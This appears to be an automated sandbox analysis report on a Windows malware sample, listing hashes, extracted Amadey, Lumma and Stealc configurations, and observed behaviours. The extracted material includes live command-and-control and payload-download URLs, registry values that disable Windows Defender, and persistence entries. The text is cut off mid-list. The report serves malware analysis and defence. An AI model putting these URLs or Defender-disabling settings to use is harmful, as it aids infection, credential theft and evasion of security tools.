Resubmissions
16/03/2025, 14:27
250316-rslvgaszdx 1016/03/2025, 08:13
250316-j4f5cswsfx 1015/03/2025, 11:26
250315-njwrjawlt6 10Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
16/03/2025, 08:13
Static task
static1
General
-
Target
random.exe
-
Size
5.6MB
-
MD5
f0cad0627e4b852e7ce633df29855373
-
SHA1
3187e3016d889fdcb5f3c38cc19c1dac27163fe4
-
SHA256
e7b933849e850c1778c1378c7a5d07df318d86f7b3ee6257885b768fa81f685c
-
SHA512
c121d9a4d2ced148ac422e193096e7596c8270c662065b9f16efe4ec4ccc1552b44ad92511246fdde7fed55fbb53c178a5da28a84533707a907084c25ad9c615
-
SSDEEP
98304:6zd9u3jgDjebrGE5pd8PY22ImKYMFCqgupRERune9rmqy3kG/TQ8swX+hh/YG6GR:0dMgebrREbJPYIpKcneY13LTQf6+hVYM
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://citydisco.bet/api
https://crosshairc.life/api
https://mrodularmall.top/api
https://jowinjoinery.icu/api
https://legenassedk.top/api
https://4htardwarehu.icu/api
https://cjlaspcorne.icu/api
https://bugildbett.top/api
https://weaponrywo.digital/api
https://zfurrycomp.top/api
https://htardwarehu.icu/api
https://8cjlaspcorne.icu/api
https://adweaponrywo.digital/api
https://loadoutle.life/api
https://caliberc.today/api
https://pistolpra.bet/api
https://weaponwo.life/api
https://armamenti.world/api
https://selfdefens.bet/api
https://targett.top/api
https://armoryarch.shop/api
https://blackeblast.run/api
https://.cocjkoonpillow.today/api
https://zfeatureccus.shop/api
https://yhtardwarehu.icu/api
https://latchclan.shop/api
https://absoulpushx.life/api
https://begindecafer.world/api
https://garagedrootz.top/api
https://9modelshiverd.icu/api
https://arisechairedd.shop/api
https://catterjur.run/api
https://orangemyther.live/api
https://fostinjec.today/api
https://sterpickced.digital/api
https://9garagedrootz.top/api
https://modelshiverd.icu/api
https://ksterpickced.digital/api
https://kbracketba.shop/api
https://featureccus.shop/api
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/7188-1727-0x0000000000AB0000-0x0000000000F10000-memory.dmp healer behavioral1/memory/7188-1726-0x0000000000AB0000-0x0000000000F10000-memory.dmp healer behavioral1/memory/7188-1816-0x0000000000AB0000-0x0000000000F10000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" baf2e63155.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" baf2e63155.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" baf2e63155.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" baf2e63155.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection baf2e63155.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" baf2e63155.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" baf2e63155.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" baf2e63155.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications baf2e63155.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" baf2e63155.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 18 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c444958f86.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0F49D2ABOTI6D55J31ZZZ7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ baf2e63155.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ affbf8475a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ EOQAPR57ODIFE70BDKFTZDQP.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 84f585a84f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3r19R.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp0VM7VYZIHK4A9ZOAFQ2617BMWK4GKUMR.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dbe09a8462.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7bf490c150.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1u87m9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2x8387.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3c203fabe0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3f0728ca94.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 43 3948 powershell.exe 67 3248 powershell.exe 202 2452 powershell.exe -
pid Process 2452 powershell.exe 2340 powershell.exe 3948 powershell.exe 3248 powershell.exe 5480 powershell.exe 3404 powershell.exe 3192 powershell.exe 4468 powershell.exe -
Downloads MZ/PE file 25 IoCs
flow pid Process 294 4208 rapes.exe 294 4208 rapes.exe 43 3948 powershell.exe 202 2452 powershell.exe 203 4228 BitLockerToGo.exe 269 4208 rapes.exe 269 4208 rapes.exe 269 4208 rapes.exe 42 4772 2x8387.exe 67 3248 powershell.exe 200 4208 rapes.exe 207 4208 rapes.exe 292 3252 c444958f86.exe 38 4208 rapes.exe 38 4208 rapes.exe 38 4208 rapes.exe 163 3380 3r19R.exe 163 3380 3r19R.exe 163 3380 3r19R.exe 163 3380 3r19R.exe 163 3380 3r19R.exe 163 3380 3r19R.exe 215 4208 rapes.exe 215 4208 rapes.exe 215 4208 rapes.exe -
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 5160 chrome.exe 5892 chrome.exe 4596 msedge.exe 5504 msedge.exe 3952 msedge.exe 1864 chrome.exe 3812 msedge.exe 2560 chrome.exe 3068 chrome.exe -
Checks BIOS information in registry 2 TTPs 36 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0F49D2ABOTI6D55J31ZZZ7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0F49D2ABOTI6D55J31ZZZ7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion EOQAPR57ODIFE70BDKFTZDQP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion EOQAPR57ODIFE70BDKFTZDQP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp0VM7VYZIHK4A9ZOAFQ2617BMWK4GKUMR.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dbe09a8462.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3c203fabe0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion baf2e63155.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3f0728ca94.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3f0728ca94.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 84f585a84f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion baf2e63155.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion affbf8475a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2x8387.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2x8387.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3r19R.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dbe09a8462.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c444958f86.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1u87m9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3c203fabe0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion affbf8475a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1u87m9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3r19R.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7bf490c150.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 84f585a84f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp0VM7VYZIHK4A9ZOAFQ2617BMWK4GKUMR.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7bf490c150.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c444958f86.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation 1u87m9.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation zY9sqWs.exe -
Executes dropped EXE 40 IoCs
pid Process 376 u0k28.exe 5568 1u87m9.exe 4208 rapes.exe 4772 2x8387.exe 4800 7d89e79575.exe 5096 EOQAPR57ODIFE70BDKFTZDQP.exe 3380 3r19R.exe 3420 Temp0VM7VYZIHK4A9ZOAFQ2617BMWK4GKUMR.EXE 3076 FnJ67k2.exe 3372 483d2fa8a0d53818306efeb32d3.exe 6036 dbe09a8462.exe 3824 139b1863a7.exe 876 139b1863a7.exe 2832 139b1863a7.exe 1564 139b1863a7.exe 4780 FnJ67k2.exe 2888 ADFoyxP.exe 4816 rapes.exe 2400 packed.exe 5600 HmngBpR.exe 1860 SplashWin.exe 4908 0000023991.exe 3376 SplashWin.exe 3944 zY9sqWs.exe 4328 Gxtuum.exe 5092 3c203fabe0.exe 2196 rsfff01fff.exe 4992 rsfff01fff.exe 588 irestore.exe 1788 irestore.exe 5868 3f0728ca94.exe 4056 7bf490c150.exe 3252 c444958f86.exe 4752 84f585a84f.exe 4516 0982cdebf5.exe 2396 0F49D2ABOTI6D55J31ZZZ7.exe 7188 baf2e63155.exe 1272 affbf8475a.exe 4588 rapes.exe 4972 Gxtuum.exe -
Identifies Wine through registry keys 2 TTPs 18 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine 1u87m9.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine dbe09a8462.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine affbf8475a.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine 2x8387.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine EOQAPR57ODIFE70BDKFTZDQP.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine 3r19R.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine 3f0728ca94.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine 7bf490c150.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine c444958f86.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine 84f585a84f.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine 0F49D2ABOTI6D55J31ZZZ7.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine baf2e63155.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine Temp0VM7VYZIHK4A9ZOAFQ2617BMWK4GKUMR.EXE Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine 3c203fabe0.exe -
Loads dropped DLL 32 IoCs
pid Process 3380 3r19R.exe 3380 3r19R.exe 1860 SplashWin.exe 1860 SplashWin.exe 1860 SplashWin.exe 3376 SplashWin.exe 3376 SplashWin.exe 3376 SplashWin.exe 4992 rsfff01fff.exe 588 irestore.exe 588 irestore.exe 588 irestore.exe 588 irestore.exe 588 irestore.exe 588 irestore.exe 588 irestore.exe 588 irestore.exe 588 irestore.exe 588 irestore.exe 588 irestore.exe 1788 irestore.exe 1788 irestore.exe 1788 irestore.exe 1788 irestore.exe 1788 irestore.exe 1788 irestore.exe 1788 irestore.exe 1788 irestore.exe 1788 irestore.exe 1788 irestore.exe 1788 irestore.exe 2356 monUninstall.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Registers new Windows logon scripts automatically executed at logon. 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Environment\UserinitMprLogonScript = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\rsfff01fff.exe" powershell.exe -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features baf2e63155.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" baf2e63155.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7d89e79575.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10232130101\\7d89e79575.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10232140121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c444958f86.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10232520101\\c444958f86.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\84f585a84f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10232530101\\84f585a84f.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0982cdebf5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10232540101\\0982cdebf5.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\baf2e63155.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10232550101\\baf2e63155.exe" rapes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" random.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" u0k28.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\Documents\desktop.ini firefox.exe File opened for modification C:\Users\Public\desktop.ini firefox.exe File opened for modification C:\Users\Public\Documents\desktop.ini firefox.exe -
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 225 ip-api.com 449 checkip.amazonaws.com 450 checkip.amazonaws.com 218 checkip.amazonaws.com 220 checkip.amazonaws.com -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000900000002418b-41.dat autoit_exe behavioral1/files/0x00070000000242cc-974.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
pid Process 5568 1u87m9.exe 4208 rapes.exe 4772 2x8387.exe 5096 EOQAPR57ODIFE70BDKFTZDQP.exe 3380 3r19R.exe 3420 Temp0VM7VYZIHK4A9ZOAFQ2617BMWK4GKUMR.EXE 3372 483d2fa8a0d53818306efeb32d3.exe 6036 dbe09a8462.exe 4816 rapes.exe 5092 3c203fabe0.exe 5868 3f0728ca94.exe 4056 7bf490c150.exe 3252 c444958f86.exe 4752 84f585a84f.exe 2396 0F49D2ABOTI6D55J31ZZZ7.exe 7188 baf2e63155.exe 1272 affbf8475a.exe 4588 rapes.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 3824 set thread context of 1564 3824 139b1863a7.exe 154 PID 4780 set thread context of 3540 4780 FnJ67k2.exe 157 PID 6036 set thread context of 4228 6036 dbe09a8462.exe 158 PID 3376 set thread context of 3920 3376 SplashWin.exe 173 PID 1788 set thread context of 1716 1788 irestore.exe 184 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\RuntimeApp\0000023991.exe packed.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job 1u87m9.exe File created C:\Windows\Tasks\Gxtuum.job zY9sqWs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 57 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c444958f86.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dbe09a8462.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EOQAPR57ODIFE70BDKFTZDQP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3r19R.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0982cdebf5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 0982cdebf5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0F49D2ABOTI6D55J31ZZZ7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language baf2e63155.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language affbf8475a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7bf490c150.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 84f585a84f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 139b1863a7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rsfff01fff.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language irestore.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rsfff01fff.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2x8387.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3f0728ca94.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 139b1863a7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language u0k28.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1u87m9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp0VM7VYZIHK4A9ZOAFQ2617BMWK4GKUMR.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3c203fabe0.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 0982cdebf5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7d89e79575.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language irestore.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 22 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3r19R.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier 